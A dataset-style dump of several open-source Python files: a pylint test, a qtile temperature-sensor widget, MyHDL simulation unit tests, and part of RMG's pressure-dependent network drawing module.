repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
axbaretto/beam | sdks/python/.tox/lint/lib/python2.7/site-packages/pylint/test/functional/init_not_called.py | 7 | 1443 | # pylint: disable=R0903,import-error,missing-docstring,wrong-import-position
"""test for __init__ not called
"""
from __future__ import print_function
class AAAA: # <3.0:[old-style-class]
"""ancestor 1"""
def __init__(self):
print('init', self)
class BBBB: # <3.0:[old-style-class]
"""ancestor 2"""
def __init__(self):
print('init', self)
class CCCC: # <3.0:[old-style-class,no-init]
"""ancestor 3"""
class ZZZZ(AAAA, BBBB, CCCC):
"""derived class"""
def __init__(self): # [super-init-not-called]
AAAA.__init__(self)
class NewStyleA(object):
"""new style class"""
def __init__(self):
super(NewStyleA, self).__init__()
print('init', self)
class NewStyleB(NewStyleA):
"""derived new style class"""
def __init__(self):
super(NewStyleB, self).__init__()
class NoInit(object):
"""No __init__ defined"""
class Init(NoInit):
"""Don't complain for not calling the super __init__"""
def __init__(self, arg):
self.arg = arg
class NewStyleC(object):
"""__init__ defined by assignemnt."""
def xx_init(self):
"""Initializer."""
pass
__init__ = xx_init
class AssignedInit(NewStyleC):
"""No init called."""
def __init__(self): # [super-init-not-called]
self.arg = 0
from missing import Missing
class UnknownBases(Missing):
"""Don't emit no-init if the bases aren't known."""
| apache-2.0 | -5,226,937,147,729,600,000 | 21.546875 | 76 | 0.581428 | false |
kopchik/qtile | libqtile/widget/sensors.py | 7 | 4737 | # -*- coding:utf-8 -*-
# Copyright (c) 2012 TiN
# Copyright (c) 2012, 2014 Tycho Andersen
# Copyright (c) 2013 Tao Sauvage
# Copyright (c) 2014-2015 Sean Vig
# Copyright (c) 2014 Adi Sieker
# Copyright (c) 2014 Foster McLane
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# coding: utf-8
import re
from six import u, PY2
from . import base
from ..utils import UnixCommandNotFound, catch_exception_and_warn
class ThermalSensor(base.InLoopPollText):
'''
For using the thermal sensor widget you need to have lm-sensors installed.
You can get a list of the tag_sensors executing "sensors" in your terminal.
Then you can choose which you want, otherwise it will display the first
available.
'''
orientations = base.ORIENTATION_HORIZONTAL
defaults = [
('metric', True, 'True to use metric/C, False to use imperial/F'),
('show_tag', False, 'Show tag sensor'),
('update_interval', 2, 'Update interval in seconds'),
('tag_sensor', None,
'Tag of the temperature sensor. For example: "temp1" or "Core 0"'),
(
'threshold',
70,
'If the current temperature value is above, '
'then change to foreground_alert colour'
),
('foreground_alert', 'ff0000', 'Foreground colour alert'),
]
def __init__(self, **config):
base.InLoopPollText.__init__(self, **config)
self.add_defaults(ThermalSensor.defaults)
self.sensors_temp = re.compile(
u(r"""
([\w ]+): # Sensor tag name
\s+[+|-] # temp signed
(\d+\.\d+) # temp value
({degrees} # ° match
[C|F]) # Celsius or Fahrenheit
""".format(degrees="\xc2\xb0" if PY2 else "\xb0")),
re.UNICODE | re.VERBOSE
)
self.value_temp = re.compile("\d+\.\d+")
temp_values = self.get_temp_sensors()
self.foreground_normal = self.foreground
if temp_values is None:
self.data = "sensors command not found"
elif len(temp_values) == 0:
self.data = "Temperature sensors not found"
elif self.tag_sensor is None:
for k in temp_values:
self.tag_sensor = k
break
@catch_exception_and_warn(warning=UnixCommandNotFound, excepts=OSError)
def get_temp_sensors(self):
"""calls the unix `sensors` command with `-f` flag if user has specified that
the output should be read in Fahrenheit.
"""
command = ["sensors", ]
if not self.metric:
command.append("-f")
sensors_out = self.call_process(command)
return self._format_sensors_output(sensors_out)
def _format_sensors_output(self, sensors_out):
"""formats output of unix `sensors` command into a dict of
{<sensor_name>: (<temperature>, <temperature symbol>), ..etc..}
"""
temperature_values = {}
for name, temp, symbol in self.sensors_temp.findall(sensors_out):
name = name.strip()
temperature_values[name] = temp, symbol
return temperature_values
def poll(self):
temp_values = self.get_temp_sensors()
if temp_values is None:
return False
text = ""
if self.show_tag and self.tag_sensor is not None:
text = self.tag_sensor + ": "
text += "".join(temp_values.get(self.tag_sensor, ['N/A']))
temp_value = float(temp_values.get(self.tag_sensor, [0])[0])
if temp_value > self.threshold:
self.layout.colour = self.foreground_alert
else:
self.layout.colour = self.foreground_normal
return text
| mit | -4,162,040,955,152,966,700 | 38.466667 | 85 | 0.627534 | false |
jck/myhdl | myhdl/test/core/test_Simulation.py | 4 | 24746 | # This file is part of the myhdl library, a Python package for using
# Python as a Hardware Description Language.
#
# Copyright (C) 2003-2008 Jan Decaluwe
#
# The myhdl library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 2.1 of the
# License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
""" Run unit tests for Simulation """
import random
from random import randrange
from unittest import TestCase
from myhdl import (Signal, Simulation, SimulationError, StopSimulation, delay,
intbv, join, now)
from myhdl._Simulation import _error
from helpers import raises_kind
random.seed(1) # random, but deterministic
QUIET=1
class Shared:
pass
class SimArgs(TestCase):
""" Simulation arguments """
def test1(self):
with raises_kind(SimulationError, _error.ArgType):
Simulation(None)
def test2(self):
def g():
yield delay(10)
i = g()
with raises_kind(SimulationError, _error.DuplicatedArg):
Simulation(i, i)
class YieldNone(TestCase):
""" Basic test of yield None behavior """
def test1(self):
def stimulus():
a = Signal(0)
yield delay(10)
a.next = 1
yield None
assert a.val == 0
assert now() == 10
yield delay(0)
assert a.val == 1
assert now() == 10
Simulation(stimulus()).run(quiet=QUIET)
def test2(self):
def stimulus():
a = Signal(0)
yield delay(10)
a.next = 1
assert a.val == 0
assert now() == 10
yield None
a.next = 0
assert a.val == 0
assert now() == 10
yield None
a.next = 1
assert a.val == 0
assert now() == 10
yield delay(0)
assert a.val == 1
assert now() == 10
Simulation(stimulus()).run(quiet=QUIET)
def test3(self):
def stimulus():
a = Signal(0)
yield delay(10)
a.next = 1
yield None, delay(10)
assert a.val == 0
assert now() == 10
yield delay(0)
assert a.val == 1
assert now() == 10
Simulation(stimulus()).run(quiet=QUIET)
def test4(self):
def stimulus():
a = Signal(0)
yield delay(10)
def gen():
yield delay(20)
a.next = 1
yield None, gen()
assert a.val == 0
assert now() == 10
yield delay(25)
assert a.val == 1
Simulation(stimulus()).run(quiet=QUIET)
class JoinMix(TestCase):
""" Test of joins mixed with other clauses """
def test1(self):
def stimulus():
a = Signal(0)
def gen():
yield join(delay(10), delay(20))
yield gen(), delay(5)
assert now() == 5
yield a
raise AssertionError("Incorrect run") # should not get here
Simulation(stimulus()).run(quiet=QUIET)
def test2(self):
def stimulus():
a = Signal(0)
yield join(delay(10), delay(20)), delay(5)
assert now() == 5
yield a
raise AssertionError("Incorrect run") # should not get here
Simulation(stimulus()).run(quiet=QUIET)
def stimulus(self, a, b, c, d):
yield delay(5)
a.next = 1
yield delay(5)
a.next = 0
b.next = 1
yield delay(5)
a.next = 1
b.next = 0
c.next = 1
yield delay(5)
a.next = 0
b.next = 1
c.next = 0
d.next = 1
def test3(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, b, c, d)
assert now() == 20
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test4(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, b), join(c, d)
assert now() == 10
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test5(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a), b, join(c, d)
assert now() == 5
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test6(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, delay(20)), b, join(c, d)
assert now() == 10
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test7(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, delay(30)), join(c, d)
assert now() == 20
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test8(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, a.negedge)
assert now() == 10
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test9(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, a.negedge, c.posedge)
assert now() == 15
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test10(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, a)
assert now() == 5
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
def test11(self):
a, b, c, d = [Signal(0) for i in range(4)]
def response():
yield join(a, b.posedge, b.negedge, a)
assert now() == 15
Simulation(self.stimulus(a, b, c, d), response()).run(quiet=QUIET)
class JoinedGen(TestCase):
""" Basic test of yielding joined concurrent generators """
def bench(self):
clk = Signal(0)
sig1 = Signal(0)
sig2 = Signal(0)
td = 10
def gen(s, n):
for i in range(n-1):
yield delay(td)
s.next = 1
yield delay(td)
for i in range(10):
offset = now()
n0 = randrange(1, 50)
n1 = randrange(1, 50)
n2 = randrange(1, 50)
sig1.next = 0
sig2.next = 0
yield join(delay(n0*td), gen(sig1, n1), gen(sig2, n2))
assert sig1.val == 1
assert sig2.val == 1
assert now() == offset + td * max(n0, n1, n2)
raise StopSimulation("Joined concurrent generator yield")
def testYieldJoinedGen(self):
Simulation(self.bench()).run(quiet=QUIET)
class SignalUpdateFirst(TestCase):
""" Check that signal updates are done first, as in VHDL """
def bench(self):
Q = Signal(0, delay=9)
R = Signal(0, delay=10)
S = Signal(0, delay=11)
def process():
Q.next = 0
R.next = 0
S.next = 0
yield delay(50)
Q.next = 1
R.next = 1
S.next = 1
yield delay(10)
assert Q.val == 1 # control
assert R.val == 1 # actual check
assert S.val == 0 # control
yield delay(1)
assert Q.val == 1 # control
assert R.val == 1 # control
assert S.val == 1 # control
raise StopSimulation("Signal update test")
return process()
def testSignalUpdateFirst(self):
Simulation(self.bench()).run(quiet=QUIET)
class YieldZeroDelay(TestCase):
""" Basic test of yielding a zero delay """
def bench(self):
clk = Signal(0)
sig1 = Signal(0)
sig2 = Signal(0)
td = 10
def gen(s, n):
s.next = 0
for i in range(n):
yield delay(td)
s.next = 1
for i in range(100):
offset = now()
n1 = randrange(2, 10)
n2 = randrange(n1+1, 20) # n2 > n1
yield delay(0), gen(sig1, n1), gen(sig2, n2)
assert sig1.val == 0
assert sig2.val == 0
assert now() == offset + 0
yield sig1.posedge
assert sig2.val == 0
assert now() == offset + n1*td
yield sig2.posedge
assert now() == offset + n2*td
raise StopSimulation("Zero delay yield")
def testYieldZeroDelay(self):
Simulation(self.bench()).run(quiet=QUIET)
class YieldConcurrentGen(TestCase):
""" Basic test of yielding concurrent generators """
def bench(self):
clk = Signal(0)
sig1 = Signal(0)
sig2 = Signal(0)
td = 10
def gen(s, n):
s.next = 0
for i in range(n):
yield delay(td)
s.next = 1
for i in range(100):
offset = now()
n1 = randrange(2, 10)
n2 = randrange(n1+1, 20) # n2 > n1
yield delay(td), gen(sig1, n1), gen(sig2, n2)
assert sig1.val == 0
assert sig2.val == 0
assert now() == offset + td
yield sig1.posedge
assert sig2.val == 0
assert now() == offset + n1*td
yield sig2.posedge
assert now() == offset + n2*td
raise StopSimulation("Concurrent generator yield")
def testYieldConcurrentGen(self):
Simulation(self.bench()).run(quiet=QUIET)
class YieldGen(TestCase):
""" Basic test of yielding generators """
def bench(self):
clk = Signal(0)
shared = Shared()
shared.cnt = 0
shared.i = 0
expected = []
nlists = []
expectedCnt = 0
for i in range(300):
l = []
for j in range(randrange(1, 6)):
e = randrange(0, 5)
l.append(e)
expectedCnt += e
expected.append(expectedCnt)
nlists.append(l)
def clkGen():
while 1:
yield delay(10)
clk.next = 1
yield delay(10)
clk.next = 0
def task(nlist):
n = nlist.pop(0)
for i in range(n):
yield clk.posedge
shared.cnt += 1
assert shared.cnt == expected[shared.i]
shared.i += 1
if nlist:
yield task(nlist)
def module():
for nlist in nlists:
yield task(nlist)
assert shared.cnt == expected[-1]
raise StopSimulation("Generator yield")
return(module(), clkGen())
def testYieldGen(self):
Simulation(self.bench()).run(quiet=QUIET)
class DeltaCycleOrder(TestCase):
""" Check that delta cycle order does not matter """
def bench(self, function):
clk = Signal(0)
a = Signal(0)
b = Signal(0)
c = Signal(0)
d = Signal(0)
z = Signal(0)
delta = [Signal(0) for i in range(4)]
inputs = Signal(intbv(0))
s = [a, b, c, d]
vectors = [intbv(j) for i in range(8) for j in range(16)]
random.shuffle(vectors)
index = list(range(4))
def clkGen():
while 1:
yield delay(10)
clk.next ^= 1
def deltaGen():
while 1:
yield clk
delta[0].next = clk.val
yield delta[0]
for i in range(1, 4):
delta[i].next = delta[i-1].val
yield delta[i]
def inGen(i):
while 1:
yield delta[i].posedge
s[index[i]].next = inputs.val[index[i]]
def logic():
while 1:
# yield a, b, c, d
z.next = function(a.val, b.val, c.val, d.val)
yield a, b, c, d
def stimulus():
for v in vectors:
inputs.next = v
random.shuffle(index)
yield clk.posedge
yield clk.posedge
assert z.val == function(v[0], v[1], v[2], v[3])
raise StopSimulation("Delta cycle order")
inputGen = [inGen(i) for i in range(4)]
instance = [clkGen(), deltaGen(), logic(), stimulus(), inputGen]
return instance
def testAnd(self):
def andFunction(a, b, c, d):
return a & b & c & d
Simulation(self.bench(andFunction)).run(quiet=QUIET)
def testOr(self):
def orFunction(a, b, c, d):
return a | b | c | d
Simulation(self.bench(orFunction)).run(quiet=QUIET)
def testXor(self):
def xorFunction(a, b, c, d):
return a ^ b ^ c ^ d
Simulation(self.bench(xorFunction)).run(quiet=QUIET)
def testMux(self):
def muxFunction(a, b, c, d):
if c:
return a
else:
return b
Simulation(self.bench(muxFunction)).run(quiet=QUIET)
def testLogic(self):
def function(a, b, c, d):
return not (a & (not b)) | ((not c) & d)
Simulation(self.bench(function)).run(quiet=QUIET)
class DeltaCycleRace(TestCase):
""" Check that delta cycle races are like in VHDL """
def bench(self):
uprange = range(300)
msig = Signal(uprange[0])
ssig = [Signal(uprange[-1]) for i in range(2)]
dsig = [Signal(uprange[0]) for i in range(2)]
clk = Signal(0)
deltaClk = Signal(0)
shared = Shared()
shared.t = now()
def clkGen():
for i in uprange[:-1]:
yield delay(10)
clk.next = 1
yield delay(10)
clk.next = 0
def deltaClkGen():
while 1:
yield clk
deltaClk.next = clk.val
def master():
i = 0
while 1:
yield clk.posedge
msig.next = uprange[i+1]
assert msig.val == uprange[i]
shared.t = now()
i += 1
def slave(ssig):
""" Double-check proper operation """
i = 0
while 1:
yield clk.posedge
ssig.next = msig.val
assert ssig.val == uprange[i-1]
i += 1
def deltaSlave(dsig):
""" Expect delta cycle races """
i = 0
while 1:
yield deltaClk.posedge
dsig.next = msig.val
assert now() == shared.t
assert dsig.val == uprange[i]
i += 1
return (slave(ssig[1]), deltaSlave(dsig[1]),
master(), clkGen(), deltaClkGen(),
slave(ssig[0]), deltaSlave(dsig[0]))
def testDeltaCycleRace(self):
""" Check delta cycle races """
bench = self.bench()
Simulation(bench).run(quiet=QUIET)
class DelayLine(TestCase):
""" Check that delay lines work properly """
def bench(self):
uprange = range(500)
sig_Z = [Signal(uprange[-i]) for i in range(7)]
clk = Signal(0)
def clkGen():
for i in uprange[:-1]:
yield delay(10)
clk.next = 1
yield delay(10)
clk.next = 0
def delayElement(n, i):
sig_Z[n].next = sig_Z[n-1].val
assert sig_Z[n].val == uprange[i-n]
def stage(n):
i = 0
while 1:
yield clk.posedge
delayElement(n, i)
i += 1
def stage012():
i = 0
while 1:
yield clk.posedge
delayElement(1, i)
sig_Z[0].next = uprange[i+1]
delayElement(2, i)
i += 1
return [stage(6), stage(4), clkGen(), stage(3), stage012(), stage(5)]
def testZeroDelay(self):
""" Zero delay behavior """
bench = self.bench()
Simulation(bench).run(quiet=QUIET)
def initSignal(waveform):
interval, val, sigdelay = waveform[0]
if sigdelay:
return Signal(val=val, delay=sigdelay)
else:
return Signal(val=val)
def isPosedge(oldval, val):
return not oldval and val
def isNegedge(oldval, val):
return oldval and not val
def isEvent(oldval, val):
return oldval != val
def isEdge(oldval, val):
return isPosedge(oldval, val) or isNegedge(oldval, val)
def getExpectedTimes(waveform, eventCheck):
interval, val, sigdelay = waveform[0]
# print waveform[0]
expected = []
time = interval
oldval = val
i = 1
while i < len(waveform):
interval, val, sigdelay = waveform[i]
# print waveform[i]
time += interval
# check future events within inertial delay interval
j = i+1
inctime = 0
while j < len(waveform) and inctime + waveform[j][0] < sigdelay:
inctime += waveform[j][0]
newval = waveform[j][1]
newsigdelay = waveform[j][2]
if newval != val: # cancel event
break
else: # same vals
if inctime + newsigdelay < sigdelay:
# special case: there is a later event, with same val,
# but smaller delay: presumably, this should win,
# so cancel the present one
break
j += 1
else: # if event was not cancelled by a break
if eventCheck(oldval, val):
expected.append(time + sigdelay)
# print expected[-1]
oldval = val
i += 1
# print expected
return expected
class Waveform(TestCase):
""" Test of all sorts of event response in a waveform """
waveform = []
duration = 0
sigdelay = 0
for i in range(2000):
interval = randrange(0, 150)
val = randrange(0, 4)
waveform.append((interval, val, sigdelay))
duration = interval + duration
def stimulus(self):
for interval, val, sigdelay in self.waveform:
yield delay(interval)
self.sig.next = val
if sigdelay:
self.sig.delay = sigdelay
def response(self, clause, expected):
assert len(expected) > 100 # we should test something
i = 0
while 1:
yield clause
assert now() == expected[i]
i += 1
def setUp(self):
self.sig = initSignal(self.waveform)
def runSim(self, sim):
sim.run(quiet=QUIET)
def testPosedge(self):
""" Posedge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isPosedge)
response = self.response(clause=s.posedge, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testNegedge(self):
""" Negedge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isNegedge)
response = self.response(clause=s.negedge, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testEdge(self):
""" Edge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isEdge)
response = self.response(clause=(s.negedge, s.posedge),
expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testEvent(self):
""" Event waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isEvent)
# print expected
response = self.response(clause=s, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testRedundantEvents(self):
""" Redundant event waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isEvent)
response = self.response(clause=(s,) * 6, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testRedundantEventAndEdges(self):
""" Redundant edge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isEvent)
response = self.response(clause=(s, s.negedge, s.posedge),
expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testRedundantPosedges(self):
""" Redundant posedge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isPosedge)
response = self.response(clause=(s.posedge,) * 3, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
def testRedundantNegedges(self):
""" Redundant negedge waveform test """
s = self.sig
stimulus = self.stimulus()
expected = getExpectedTimes(self.waveform, isNegedge)
response = self.response(clause=(s.negedge,) * 9, expected=expected)
self.runSim(Simulation(stimulus, response))
assert self.duration <= now()
class WaveformSigDelay(Waveform):
""" Repeat waveform tests with a delayed signal """
waveform = []
duration = 0
sigdelay = 0
for i in range(2000):
interval = randrange(20, 150)
val = randrange(0, 4)
sigdelay = randrange(1, 20)
waveform.append((interval, val, sigdelay))
duration += interval
class WaveformInertialDelay(Waveform):
""" Repeat waveform tests to check inertial delay """
waveform = []
duration = 0
sigdelay = 0
for i in range(2000):
interval = randrange(3, 10)
val = randrange(0, 3)
sigdelay = randrange(1, 5)
waveform.append((interval, val, sigdelay))
duration += interval
class WaveformInertialDelayStress(Waveform):
""" Repeat waveform tests to stress inertial delay """
waveform = []
duration = 0
sigdelay = 0
for i in range(2000):
interval = randrange(1, 3)
val = randrange(0, 3)
sigdelay = randrange(1, 3)
waveform.append((interval, val, sigdelay))
duration += interval
class SimulationRunMethod(Waveform):
""" Basic test of run method of Simulation object """
def runSim(self, sim):
duration = randrange(1, 300)
while sim.run(duration, quiet=QUIET):
duration = randrange(1, 300)
class TimeZeroEvents(TestCase):
""" Check events at time 0 """
def bench(self, sig, next, clause, timeout=1):
val = sig.val
def stimulus():
sig.next = next
yield delay(10)
def response():
yield clause, delay(timeout)
assert now() == 0
assert sig.val == next
return [stimulus(), response()]
def testEvent(self):
""" Event at time 0 """
s = Signal(0)
testBench = self.bench(sig=s, next=1, clause=s)
Simulation(testBench).run(quiet=QUIET)
def testPosedge(self):
""" Posedge at time 0 """
s = Signal(0)
testBench = self.bench(sig=s, next=1, clause=s.posedge)
Simulation(testBench).run(quiet=QUIET)
def testNegedge(self):
""" Negedge at time 0 """
s = Signal(1)
testBench = self.bench(sig=s, next=0, clause=s.negedge)
Simulation(testBench).run(quiet=QUIET)
| lgpl-2.1 | -7,527,635,209,544,915,000 | 27.18451 | 78 | 0.520286 | false |
Molecular-Image-Recognition/Molecular-Image-Recognition | code/rmgpy/pdep/draw.py | 2 | 19054 | #!/usr/bin/env python
# encoding: utf-8
################################################################################
#
# RMG - Reaction Mechanism Generator
#
# Copyright (c) 2002-2017 Prof. William H. Green ([email protected]),
# Prof. Richard H. West ([email protected]) and the RMG Team ([email protected])
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the 'Software'),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
"""
This module contains the :class:`NetworkDrawer` class, used to generate a
depiction of a pressure-dependent reaction network.
"""
import numpy
import logging
from rmgpy.molecule.draw import MoleculeDrawer, createNewSurface
################################################################################
class NetworkDrawer:
"""
This class provides functionality for drawing the potential energy surface
for a pressure-dependent reaction network using the Cairo 2D graphics
engine. The most common use case is simply::
NetworkDrawer().draw(network, format='png', path='network.png')
where ``network`` is the :class:`Network` object to draw. You can also
pass a dict of options to the constructor to affect how the network is
drawn.
"""
def __init__(self, options=None):
self.options = {
'structures': True,
'fontFamily': 'sans',
'fontSizeNormal': 12,
'Eunits': 'kJ/mol',
'padding': 16,
'wellWidth': 64,
'wellSpacing': 64,
'Eslope': 1.5,
'TSwidth': 16,
'E0offset': 0.0,
}
if options: self.options.update(options)
self.clear()
def clear(self):
self.network = None
self.left = 0.0
self.top = 0.0
self.right = 0.0
self.bottom = 0.0
self.surface = None
self.cr = None
def __getEnergyRange(self):
"""
Return the minimum and maximum energy in J/mol on the potential energy
surface.
"""
E0min = self.network.isomers[0].E0
E0max = E0min
for isomer in self.network.isomers[1:]:
E0 = isomer.E0
if E0 < E0min: E0min = E0
if E0 > E0max: E0max = E0
for reactant in self.network.reactants:
E0 = reactant.E0
if E0 < E0min: E0min = E0
if E0 > E0max: E0max = E0
for product in self.network.products:
E0 = product.E0
if E0 < E0min: E0min = E0
if E0 > E0max: E0max = E0
for rxn in self.network.pathReactions:
E0 = rxn.transitionState.conformer.E0.value_si
if E0 < E0min: E0min = E0
if E0 > E0max: E0max = E0
return E0min, E0max
def __useStructureForLabel(self, configuration):
"""
Return ``True`` if the configuration should use molecular structures
for its labels or ``False`` otherwise.
"""
# Initialize with the current user option value
useStructures = self.options['structures']
# But don't use structures if one or more species in the configuration
# do not have structure data
for spec in configuration.species:
if spec.molecule is None or len(spec.molecule) == 0:
useStructures = False
break
return useStructures
def __getTextSize(self, text, padding=2, format='pdf'):
"""
"""
try:
import cairocffi as cairo
except ImportError:
import cairo
# Use dummy surface to determine text extents
surface = createNewSurface(format)
cr = cairo.Context(surface)
cr.set_font_size(self.options['fontSizeNormal'])
extents = cr.text_extents(text)
width = extents[2] + 2 * padding
height = extents[3] + 2 * padding
return [0, 0, width, height]
def __drawText(self, text, cr, x0, y0, padding=2):
"""
"""
cr.save()
cr.set_font_size(self.options['fontSizeNormal'])
extents = cr.text_extents(text)
cr.move_to(x0 - extents[0] - padding, y0 - extents[1] + padding)
cr.set_source_rgba(0.0, 0.0, 0.0, 1.0)
cr.show_text(text)
cr.restore()
width = extents[2] + 2 * padding
height = extents[3] + 2 * padding
return [0, 0, width, height]
def __getLabelSize(self, configuration, format='pdf'):
"""
"""
width = 0; height = 0; boundingRects = []
if self.__useStructureForLabel(configuration):
for spec in configuration.species:
surface, cr, rect = MoleculeDrawer().draw(spec.molecule[0], format=format)
boundingRects.append(list(rect))
else:
for spec in configuration.species:
boundingRects.append(self.__getTextSize(spec.label, format=format))
plusRect = self.__getTextSize('+', format=format)
for rect in boundingRects:
if width < rect[2]: width = rect[2]
height += rect[3] + plusRect[3]
height -= plusRect[3]
return [0, 0, width, height]
def __drawLabel(self, configuration, cr, x0, y0, format='pdf'):
boundingRect = self.__getLabelSize(configuration, format=format)
padding = 2
useStructures = self.__useStructureForLabel(configuration)
y = y0
for i, spec in enumerate(configuration.species):
if i > 0:
rect = self.__getTextSize('+', padding=padding, format=format)
x = x0 - 0.5 * (rect[2] - boundingRect[2]) + 2 * padding
self.__drawText('+', cr, x, y)
y += rect[3]
if useStructures:
moleculeDrawer = MoleculeDrawer()
cr.save()
surf, c, rect = moleculeDrawer.draw(spec.molecule[0], format=format)
cr.restore()
x = x0 - 0.5 * (rect[2] - boundingRect[2])
cr.save()
moleculeDrawer.render(cr, offset=(x, y))
cr.restore()
y += rect[3]
else:
rect = self.__getTextSize(spec.label, padding=padding, format=format)
x = x0 - 0.5 * (rect[2] - boundingRect[2]) + 2 * padding
self.__drawText(spec.label, cr, x, y)
y += rect[3]
return boundingRect
def draw(self, network, format, path=None):
"""
Draw the potential energy surface for the given `network` as a Cairo
surface of the given `format`. If `path` is given, the surface is
saved to that location on disk.
"""
try:
import cairocffi as cairo
except ImportError:
try:
import cairo
except ImportError:
logging.warning('Cairo not found; potential energy surface will not be drawn.')
return
self.network = network
# The order of wells is as follows:
# - Reactant channels come first (to the left)
# - Isomers are in the middle
# - Product channels come last (to the right)
# This is done because most people will read the PES from left to right
wells = []
wells.extend(network.reactants)
wells.extend(network.isomers)
wells.extend(network.products)
# Generate the bounding rectangles for each configuration label
labelRects = []
for well in wells:
labelRects.append(self.__getLabelSize(well, format=format))
# Get energy range (use kJ/mol internally)
E0min, E0max = self.__getEnergyRange()
E0min *= 0.001; E0max *= 0.001
# Drawing parameters
padding = self.options['padding']
wellWidth = self.options['wellWidth']
wellSpacing = self.options['wellSpacing']
Eslope = self.options['Eslope']
TSwidth = self.options['TSwidth']
E0_offset = self.options['E0offset'] * 0.001
# Choose multiplier to convert energies to desired units (on figure only)
Eunits = self.options['Eunits']
try:
Emult = {'J/mol': 1.0, 'kJ/mol': 0.001, 'cal/mol': 1.0/4.184, 'kcal/mol': 1.0/4184., 'cm^-1': 1.0/11.962}[Eunits]
except KeyError:
raise Exception('Invalid value "{0}" for Eunits parameter.'.format(Eunits))
# Determine height required for drawing
Eheight = self.__getTextSize('0.0', format=format)[3] + 6
y_E0 = (E0max - 0.0) * Eslope + padding + Eheight
height = (E0max - E0min) * Eslope + 2 * padding + Eheight + 6
for i in range(len(wells)):
if 0.001 * wells[i].E0 == E0min:
height += labelRects[i][3]
break
# Determine naive position of each well (one per column)
coordinates = numpy.zeros((len(wells), 2), numpy.float64)
